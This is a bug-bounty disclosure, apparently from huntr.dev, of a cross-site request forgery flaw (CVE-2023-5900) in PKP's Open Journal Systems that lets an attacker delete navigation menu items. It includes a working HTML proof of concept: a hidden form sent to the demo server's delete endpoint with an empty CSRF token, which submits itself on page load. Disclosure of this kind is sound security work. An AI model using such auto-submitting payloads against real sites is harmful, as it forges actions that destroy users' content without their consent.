Lucene search
Hainguyen0207C3F011D4-9F76-4B2B-B3D4-A5E2ECD2E354HistorySep 28, 2023 - 5:29 p.m.
CSRF Delete Navigation Menu Items
2023-09-2817:29:41
hainguyen0207
www.huntr.dev
6
csrf
delete
navigation
menu items
fake requests
bug bounty
Description
CSRF Delete Navigation Menu Items
Proof of Concept
1 .Attack sends fake requests to users
<html>
<body>
<form action="https://demo.publicknowledgeproject.org/ojs3/testdrive/index.php/testdrive-journal/$$$call$$$/grid/navigation-
menus/navigation-menu-items-grid/delete-navigation-menu-item">
<input type="hidden" name="navigationMenuItemId" value="330" />
<input type="hidden" name="csrfToken" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
2 .User click, deletes unwanted Navigation Menu Items
Payload Poc
https://drive.google.com/file/d/15cjZ2oBeBmUx-C9_kRqBXKMXLX8LU5Ew/view?usp=sharing
Video Poc
https://drive.google.com/file/d/1Bp1M3ifN9rXdxhjfyAIibmy0QFhYluEu/view?usp=sharing
Related
osv
osv
CVE-2023-5900
2023-11-07 04:24:31
prion
prion
Cross site request forgery (csrf)
2023-11-07 04:24:00
cve
cve
CVE-2023-5900
2023-11-07 04:24:31
cvelist
cvelist
CVE-2023-5900 Cross-Site Request Forgery in pkp/pkp-lib
2023-11-01 00:00:42
nvd
nvd
CVE-2023-5900
2023-11-07 04:24:31
AI Score
7.1
Confidence
Low
EPSS
0.001
Percentile
17.0%
Related for C3F011D4-9F76-4B2B-B3D4-A5E2ECD2E354